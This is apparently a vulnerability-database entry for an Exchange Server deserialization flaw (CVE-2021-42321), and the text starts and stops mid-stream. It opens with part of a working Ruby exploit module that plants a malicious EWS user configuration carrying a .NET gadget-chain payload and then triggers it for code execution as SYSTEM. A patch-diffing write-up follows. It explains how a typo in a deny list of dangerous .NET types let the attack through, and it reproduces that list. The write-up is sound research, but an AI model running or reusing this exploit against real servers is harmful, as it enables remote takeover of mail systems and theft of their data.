xml_tag.attribute('ChangeKey').value\n folder_id_val = xml_tag.attribute('Id').value\n print_good(\"ChangeKey value for Inbox folder is #{change_key_val}\")\n print_good(\"ID value for Inbox folder is #{folder_id_val}\")\n\n # Delete the user configuration object that currently on the Inbox folder.\n print_status('Deleting the user configuration object associated with Inbox folder...')\n xml_delete_inbox_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:DeleteUserConfiguration>\n <m:UserConfigurationName Name=\"ExtensionMasterTable\">\n <t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" />\n </m:UserConfigurationName>\n </m:DeleteUserConfiguration>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_delete_inbox_user_config,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}\n print_good('Successfully deleted the user configuration object associated with the Inbox folder!')\n else\n print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')\n print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')\n end\n\n # Now to replace the deleted user configuration object with our own user configuration object.\n print_status('Creating the malicious user configuration object on the Inbox folder!')\n\n xml_malicious_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:CreateUserConfiguration>\n <m:UserConfiguration>\n <t:UserConfigurationName Name=\"ExtensionMasterTable\">\n <t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" />\n </t:UserConfigurationName>\n <t:Dictionary>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>OrgChkTm</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>Integer64</t:Type>\n <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>OrgDO</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>Boolean</t:Type>\n <t:Value>false</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n </t:Dictionary>\n <t:BinaryData>#{Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: @gadget_chain, formatter: :BinaryFormatter))}</t:BinaryData>\n </m:UserConfiguration>\n </m:CreateUserConfiguration>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_malicious_user_config,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}\n fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')\n end\n\n print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')\n\n # Deserialize our object. If all goes well, you should now have SYSTEM :)\n print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')\n xml_get_client_access_token = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:GetClientAccessToken>\n <m:TokenRequests>\n <t:TokenRequest>\n <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id>\n <t:TokenType>CallerIdentity</t:TokenType>\n </t:TokenRequest>\n </m:TokenRequests>\n </m:GetClientAccessToken>\n </soap:Body>\n </soap:Envelope>)\n\n begin\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_get_client_access_token,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n rescue Errno::ECONNRESET\n # when using the DataSetTypeSpoof gadget, it's expected that this connection reset exception will be raised\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37920", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-02-27T17:14:47", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 21, 2021 5:55pm UTC reported:\n\nA PoC for this vulnerability is now available at <https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398>. There is also a Metasploit module at <https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_chainedserializationbinder_denylist_typo_rce.rb>\n\nWhat follows is my writeup for this that I wrote a while back, containing info on finding the bug from the patches as well as some info on the side effects of exploiting this bug.\n\n# Intro\n\nAlright so looks like this bug, CVE-2021-42321 is a post authentication RCE bug.\n\nOnly affects Exchange 2016 CU 21 and CU 22. Also Exchange 2019 CU 10 and CU 11.\n\nFound bug fix by patch diffing the October 2021 security updates and the November 2021 patches. Aka <https://support.microsoft.com/help/5007409> which applies the November 2021 patch, and KB5007012 aka the October 2021 patch.\n\nPersonally I found that we can use [[7Zip]] to uncompress the MSI files from the patches, then use [[dnSpy]] from <https://github.com/dnSpy/dnSpy> to load all files in the directory we extract the patch contents to a folder. Note that [[ILSpy]] is a nice alternative however unfortunately it does run into issues with decompiling files that [[dnSpy]] can handle fine, so you end up missing lots of files from the export.\n\nOnce decompilation is done use `File->Remove assemblies with load errors` to remove the extra files that couldn\u2019t be decompiled, then use `File -> Save Code` after selecting every single file in the code and it should show us the opportunity to create a new project to save the code to.\n\nFrom here we can create a new directory to save the code into and tell it to save the decompiled code into that.\n\nFrom there we can use [[Meld]] to do a directory diff of the files from the two patch files to see what changed.\n\n# Analyzing the Diff\n\n## Finding the Changed Files\n\nLooking at just the new/removed files we can see the following:\n\n![[Pasted image 20220205113200.png]]\n\nAs we can see here of particular note given this is a serialization bug is the fact that `Microsoft.Exchange.Compliance.dll` had three files removed from it, specifically under the `Microsoft.Exchange.Compliance\\Compliance\\Serialiation\\Formatters` directory for the following files:\n\n * TypedBinaryFormatter.cs \n\n * TypedSerialiationFormatter.cs \n\n * TypedSoapFormatter.cs \n\n\n## Narrowing in on The Vulnerable File \u2013 TypedBinaryFormatter.cs\n\nLooking through these files we can see that `TypedBinaryFormatter.cs` has a function named `Deserialize` with the following prototype:\n \n \n // Microsoft.Exchange.Compliance.Serialization.Formatters.TypedBinaryFormatter \n using System.IO; \n using System.Runtime.Serialization; \n using Microsoft.Exchange.Diagnostics; \n \n private static object Deserialize(Stream serializationStream, SerializationBinder binder) \n { \n \u00a0\u00a0\u00a0\u00a0return ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation.ComplianceFormatter, strictMode: false, allowedTypes, allowedGenerics).Deserialize(serializationStream); \n }\n \n\nWhat is interesting here is that `binder` is a `SerializationBinder`, which is a essentially a class that acts as a controller to tell the program what can be and can\u2019t be serialized and deserialized. Yet this is never passed into the `ExchangeBinaryFormatterFactory.CreateBinaryFormatter()` function, so it never gets this crucial information on what it is meant to be blocking as far as deserialization goes.\n\n## Examining Deserialize() Function Call to CallExchangeBinaryFormatterFactory.CreateBinaryFormatter()\n\nLets see where `ExchangeBinaryFormatterFactory.CreateBinaryFormatter` is defined. Looking for the string `ExchangeBinaryFormatter` in [[dnSpy]] will bring us to `Microsoft.Exchange.Diagnostics.dll` under the `Microsoft.Exchange.Diagnostics` namespace, then the `ExchangeBinaryFormatterFactory` we can see the definition for `ExchangeBinaryFormatterFactory.CreateBinaryFormatter()` as:\n \n \n // Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory \n using System.Runtime.Serialization.Formatters.Binary; \n \n public static BinaryFormatter CreateBinaryFormatter(DeserializeLocation usageLocation, bool strictMode = false, string[] allowList = null, string[] allowedGenerics = null) \n { \n \u00a0\u00a0\u00a0\u00a0return new BinaryFormatter \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Binder = new ChainedSerializationBinder(usageLocation, strictMode, allowList, allowedGenerics) \n \u00a0\u00a0\u00a0\u00a0}; \n }\n \n\nNote also that in the original call `strictMode` was set to `false` and the `allowList` and `allowedGenerics` were set to `TypedBinaryFormatter.allowedTypes`, and `TypedBinaryFormatter.allowedGenerics` respectively. Meanwhile `useageLocation` was set to `DeserializeLocation.ComplianceFormatter`.\n\nThis will mean that we end up calling `ChainedSerializationBinder` with:\n\n * `strictMode` set to `false`, \n\n * `allowList` set to `TypedBinaryFormatter.allowedTypes` \n\n * `allowedGenerics` set to `TypedBinaryFormatter.allowedGenerics` \n\n * `usageLocation` set to `DeserializeLocation.ComplianceFormatter`. \n\n\n## Examining ChainedSerializationBinder Class Deeper\n\nIf we look at the code we can see that a new `ChainedSerializationBinder` instance is being created so lets take a look at that.\n\nWe can see the definition of the initialization function here:\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System; \n using System.Collections.Generic; \n \n public ChainedSerializationBinder(DeserializeLocation usageLocation, bool strictMode = false, string[] allowList = null, string[] allowedGenerics = null) \n { \n \u00a0\u00a0\u00a0\u00a0this.strictMode = strictMode; \n \u00a0\u00a0\u00a0\u00a0allowedTypesForDeserialization = ((allowList != null && allowList.Length != 0) ? new HashSet<string>(allowList) : null); \n \u00a0\u00a0\u00a0\u00a0allowedGenericsForDeserialization = ((allowedGenerics != null && allowedGenerics.Length != 0) ? new HashSet<string>(allowedGenerics) : null); \n \u00a0\u00a0\u00a0\u00a0typeResolver = typeResolver ?? ((Func<string, Type>)((string s) => Type.GetType(s))); \n \u00a0\u00a0\u00a0\u00a0location = usageLocation; \n }\n \n\nHere we can see that `allowedTypesForDeserialization` is set to `TypedBinaryFormatter.allowedTypes` and `allowedGenericsForDeserialization` is set to `TypedBinaryFormatter.allowedGenerics`. Furthermore, `this.strictMode` is set to `false`, and `location` is set to `DeserializeLocation.ComplianceFormatter`.\n\nNext we should know that `BindToType()` is used to validate the class for deserialization. So lets take a look at that logic inside the `ChainedSerializationBinder` class.\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System; \n \n public override Type BindToType(string assemblyName, string typeName) \n { \n \u00a0\u00a0\u00a0\u00a0if (serializationOnly) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new InvalidOperationException(\"ChainedSerializationBinder was created for serialization only.\u00a0\u00a0This instance cannot be used for deserialization.\"); \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0Type type = InternalBindToType(assemblyName, typeName); \n \u00a0\u00a0\u00a0\u00a0if (type != null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ValidateTypeToDeserialize(type); \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0return type; \n }\n \n\nSince `serializationOnly` isn\u2019t set, we will skip this logic and get the type using `InternalBindToType()` which is a simple wrapper around `LoadType()` with no validation:\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System; \n \n protected virtual Type InternalBindToType(string assemblyName, string typeName) \n { \n \u00a0\u00a0\u00a0\u00a0return LoadType(assemblyName, typeName); \n }\n \n\nAfter getting the type we then check the type wasn\u2019t `null`, aka we were able to find a valid type, and we call `ValidateTypeToDeserialize(type)` to validate that the type is okay to deserialize.\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System; \n \n protected void ValidateTypeToDeserialize(Type typeToDeserialize) \n { \n \u00a0\u00a0\u00a0\u00a0if (typeToDeserialize == null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return; \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0string fullName = typeToDeserialize.FullName; \n \u00a0\u00a0\u00a0\u00a0bool flag = strictMode; \n \u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!strictMode && (allowedTypesForDeserialization == null || !allowedTypesForDeserialization.Contains(fullName)) && GlobalDisallowedTypesForDeserialization.Contains(fullName)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0flag = true; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new InvalidOperationException($\"Type {fullName} failed deserialization (BlockList).\"); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (typeToDeserialize.IsConstructedGenericType) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0fullName = typeToDeserialize.GetGenericTypeDefinition().FullName; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (allowedGenericsForDeserialization == null || !allowedGenericsForDeserialization.Contains(fullName) || GlobalDisallowedGenericsForDeserialization.Contains(fullName)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new BlockedDeserializeTypeException(fullName, BlockedDeserializeTypeException.BlockReason.NotInAllow, location); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else if (!AlwaysAllowedPrimitives.Contains(fullName) && (allowedTypesForDeserialization == null || !allowedTypesForDeserialization.Contains(fullName) || GlobalDisallowedTypesForDeserialization.Contains(fullName)) && !typeToDeserialize.IsArray && !typeToDeserialize.IsEnum && !typeToDeserialize.IsAbstract && !typeToDeserialize.IsInterface) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new BlockedDeserializeTypeException(fullName, BlockedDeserializeTypeException.BlockReason.NotInAllow, location); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0catch (BlockedDeserializeTypeException ex) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0DeserializationTypeLogger.Singleton.Log(ex.TypeName, ex.Reason, location, (flag || strictMode) ? DeserializationTypeLogger.BlockStatus.TrulyBlocked : DeserializationTypeLogger.BlockStatus.WouldBeBlocked); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (flag) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nHere is where the code gets interesting. You see, there is only one catch statement, which is designed to catch all `BlockedDeserializationTypeException` errors, however `if (!strictMode && (allowedTypesForDeserialization == null || !allowedTypesForDeserialization.Contains(fullName)) && GlobalDisallowedTypesForDeserialization.Contains(fullName))` will result in an unhandled `InvalidOperationException` being thrown if both `strictMode` isn\u2019t set and the type we are trying to deserialize is within the `GlobalDisallowedTypesForDeserialization` and has not been granted exception via the `allowedTypesForDeserialization` list. Since `strictMode` is not set, there is the very real possibility this exception might be thrown, so this is something we have to watch out for.\n\nOtherwise every other exception thrown will be caught by this `catch (BlockedDeserializeTypeException ex)` code, however it will interestingly log the exception as a `DeserializationTypeLogger.BlockStatus.WouldBeBlocked` error since `strictMode` is set to false as is `flag` which is set as `bool flag = strictMode;` earlier in the code.\n\nAdditionally since `flag` isn\u2019t set since `strictMode` is set to `false`, no error is thrown and the code proceeds normally without any errors.\n\nHowever what is in this blacklist denoted by `GlobalDisallowedTypesForDeserialization`? Lets find out. First we need to find out how `GlobalDisallowedTypesForDeserialization` is defined.\n\n## Looking Deeper at GlobalDisallowedTypesForDeserialization Type Blacklist \u2013 Aka Finding the Bug\n\nLooking at the code for `Microsoft.Exchange.Diagnostics.ChainedSerializationBinder` we can see that `GlobalDisallowedTypesForDeserialization` is actually set to the result of `BuildDisallowedTypesForDeserialization()` when it is initialized:\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System; \n using System.Collections.Generic; \n using System.IO; \n using System.Linq; \n using System.Reflection; \n using System.Runtime.Serialization; \n using Microsoft.Exchange.Diagnostics; \n \n public class ChainedSerializationBinder : SerializationBinder \n { \n \u00a0\u00a0\u00a0\u00a0private const string TypeFormat = \"{0}, {1}\"; \n \n \u00a0\u00a0\u00a0\u00a0private static readonly HashSet<string> AlwaysAllowedPrimitives = new HashSet<string> \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(string).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(int).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(uint).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(long).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(ulong).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(double).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(float).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(bool).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(short).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(ushort).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(byte).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(char).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(DateTime).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(TimeSpan).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(Guid).FullName \n \u00a0\u00a0\u00a0\u00a0}; \n \n \u00a0\u00a0\u00a0\u00a0private bool strictMode; \n \n \u00a0\u00a0\u00a0\u00a0private DeserializeLocation location; \n \n \u00a0\u00a0\u00a0\u00a0private Func<string, Type> typeResolver; \n \n \u00a0\u00a0\u00a0\u00a0private HashSet<string> allowedTypesForDeserialization; \n \n \u00a0\u00a0\u00a0\u00a0private HashSet<string> allowedGenericsForDeserialization; \n \n \u00a0\u00a0\u00a0\u00a0private bool serializationOnly; \n \n \u00a0\u00a0\u00a0\u00a0protected static HashSet<string> GlobalDisallowedTypesForDeserialization { get; private set; } = BuildDisallowedTypesForDeserialization();\n \n\nIf we decompile this function we can notice something interesting:\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System.Collections.Generic;\n \n private static HashSet<string> BuildDisallowedTypesForDeserialization() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new HashSet<string> \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\"Microsoft.Data.Schema.SchemaModel.ModelStore\",\n \t\t\t\"Microsoft.FailoverClusters.NotificationViewer.ConfigStore\",\n \t\t\t\"Microsoft.IdentityModel.Claims.WindowsClaimsIdentity\",\n \t\t\t\"Microsoft.Management.UI.Internal.FilterRuleExtensions\",\n \t\t\t\"Microsoft.Management.UI.FilterRuleExtensions\",\n \t\t\t\"Microsoft.Reporting.RdlCompile.ReadStateFile\",\n \t\t\t\"Microsoft.TeamFoundation.VersionControl.Client.PolicyEnvelope\",\n \t\t\t\"Microsoft.VisualStudio.DebuggerVisualizers.VisualizerObjectSource\",\n \t\t\t\"Microsoft.VisualStudio.Editors.PropPageDesigner.PropertyPageSerializationService+PropertyPageSerializationStore\",\n \t\t\t\"Microsoft.VisualStudio.EnterpriseTools.Shell.ModelingPackage\",\n \t\t\t\"Microsoft.VisualStudio.Modeling.Diagnostics.XmlSerialization\",\n \t\t\t\"Microsoft.VisualStudio.Publish.BaseProvider.Util\",\n \t\t\t\"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\",\n \t\t\t\"Microsoft.VisualStudio.Web.WebForms.ControlDesignerStateCache\",\n \t\t\t\"Microsoft.Web.Design.Remote.ProxyObject\",\n \t\t\t\"System.Activities.Presentation.WorkflowDesigner\",\n \t\t\t\"System.AddIn.Hosting.AddInStore\",\n \t\t\t\"System.AddIn.Hosting.Utils\",\n \t\t\t\"System.CodeDom.Compiler.TempFileCollection\",\n \t\t\t\"System.Collections.Hashtable\",\n \t\t\t\"System.ComponentModel.Design.DesigntimeLicenseContextSerializer\",\n \t\t\t\"System.Configuration.Install.AssemblyInstaller\",\n \t\t\t\"System.Configuration.SettingsPropertyValue\",\n \t\t\t\"System.Data.DataSet\",\n \t\t\t\"System.Data.DataViewManager\",\n \t\t\t\"System.Data.Design.MethodSignatureGenerator\",\n \t\t\t\"System.Data.Design.TypedDataSetGenerator\",\n \t\t\t\"System.Data.Design.TypedDataSetSchemaImporterExtension\",\n \t\t\t\"System.Data.SerializationFormat\",\n \t\t\t\"System.DelegateSerializationHolder\",\n \t\t\t\"System.Drawing.Design.ToolboxItemContainer\",\n \t\t\t\"System.Drawing.Design.ToolboxItemContainer+ToolboxItemSerializer\",\n \t\t\t\"System.IdentityModel.Services.Tokens.MachineKeySessionSecurityTokenHandler\",\n \t\t\t\"System.IdentityModel.Tokens.SessionSecurityToken\",\n \t\t\t\"System.IdentityModel.Tokens.SessionSecurityTokenHandler\",\n \t\t\t\"System.IO.FileSystemInfo\",\n \t\t\t\"System.Management.Automation.PSObject\",\n \t\t\t\"System.Management.IWbemClassObjectFreeThreaded\",\n \t\t\t\"System.Messaging.BinaryMessageFormatter\",\n \t\t\t\"System.Resources.ResourceReader\",\n \t\t\t\"System.Resources.ResXResourceSet\",\n \t\t\t\"System.Runtime.Remoting.Channels.BinaryClientFormatterSink\",\n \t\t\t\"System.Runtime.Remoting.Channels.BinaryClientFormatterSinkProvider\",\n \t\t\t\"System.Runtime.Remoting.Channels.BinaryServerFormatterSink\",\n \t\t\t\"System.Runtime.Remoting.Channels.BinaryServerFormatterSinkProvider\",\n \t\t\t\"System.Runtime.Remoting.Channels.CrossAppDomainSerializer\",\n \t\t\t\"System.Runtime.Remoting.Channels.SoapClientFormatterSink\",\n \t\t\t\"System.Runtime.Remoting.Channels.SoapClientFormatterSinkProvider\",\n \t\t\t\"System.Runtime.Remoting.Channels.SoapServerFormatterSink\",\n \t\t\t\"System.Runtime.Remoting.Channels.SoapServerFormatterSinkProvider\",\n \t\t\t\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\",\n \t\t\t\"System.Runtime.Serialization.Formatters.Soap.SoapFormatter\",\n \t\t\t\"System.Runtime.Serialization.NetDataContractSerializer\",\n \t\t\t\"System.Security.Claims.ClaimsIdentity\",\n \t\t\t\"System.Security.ClaimsPrincipal\",\n \t\t\t\"System.Security.Principal.WindowsIdentity\",\n \t\t\t\"System.Security.Principal.WindowsPrincipal\",\n \t\t\t\"System.Security.SecurityException\",\n \t\t\t\"System.Web.Security.RolePrincipal\",\n \t\t\t\"System.Web.Script.Serialization.JavaScriptSerializer\",\n \t\t\t\"System.Web.Script.Serialization.SimpleTypeResolver\",\n \t\t\t\"System.Web.UI.LosFormatter\",\n \t\t\t\"System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem\",\n \t\t\t\"System.Web.UI.ObjectStateFormatter\",\n \t\t\t\"System.Windows.Data.ObjectDataProvider\",\n \t\t\t\"System.Windows.Forms.AxHost+State\",\n \t\t\t\"System.Windows.ResourceDictionary\",\n \t\t\t\"System.Workflow.ComponentModel.Activity\",\n \t\t\t\"System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector\",\n \t\t\t\"System.Xml.XmlDataDocument\",\n \t\t\t\"System.Xml.XmlDocument\"\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}; \n \u00a0\u00a0\u00a0\u00a0}\n \n\nThis is a bit hard to read, so lets take a look at the patch diff from [[Meld]]:\n\n![[Pasted image 20220205130924.png]]\n\nHuh looks like there was a typo in the `Security.System.Claims.ClaimsPrincipal` blacklist entry where it was typed as `Security.System.ClaimsPrincipal` aka we missed an extra `.Claims` in the name.\n\n## Why Security.System.Claims.ClaimsPrincipal Was Blocked \u2013 A Deeper Dive into The Root Issue\n\nLets look at the call chain here. If we decompile the code for `System.Security.Claims.ClaimsPrincipal` we can see mentions of `OnDeserialized` which has a more full explanation at <https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.ondeserializedattribute?view=net-6.0>. Note that it states `When OnDeserializedAttribute class is applied to a method, specifies that the method is called immediately after deserialization of an object in an object graph. The order of deserialization relative to other objects in the graph is non-deterministic.`\n\nOf particular interest is the `OnDeserializedMethod()` method which is called after deserialization takes place. Note that if there was a `OnDeserializingMethod` that would be called _during_ deserialization which would also work.\n\nLooking into the class more we notice the following functions:\n\nInitializer. Note that this is labeled as `[NonSerialized]` so despite it calling the `Deserialize()` method it will not be called upon deserialization as it as explicitly declared itself as something that can\u2019t be deserialized. Thus we can\u2019t use this function to trigger the desired `Deserialize()` method call. Lets keep looking.\n \n \n // System.Security.Claims.ClaimsPrincipal \n using System.Collections.Generic; \n using System.IO; \n using System.Runtime.Serialization; \n using System.Security.Principal; \n \n [OptionalField(VersionAdded = 2)] \n private string m_version = \"1.0\"; \n [NonSerialized] \n private List<ClaimsIdentity> m_identities = new List<ClaimsIdentity>(); \n [SecurityCritical] \n protected ClaimsPrincipal(SerializationInfo info, StreamingContext context) \n { \n \u00a0\u00a0\u00a0\u00a0if (info == null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new ArgumentNullException(\"info\"); \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0Deserialize(info, context); \n }\n \n\nThe next place to look is that weird `OnDeserialized()` method. Lets take a look at its code. We can see that the `[OnDeserialized]` class is applied to this method meaning that `method is called immediately after deserialization of an object in an object graph`. We can also see that it takes in a `StreamingContext` parameter and then proceeds to call `DeserializeIdentities()` with a variable known as `m_serializedClaimIdentities`:\n \n \n // 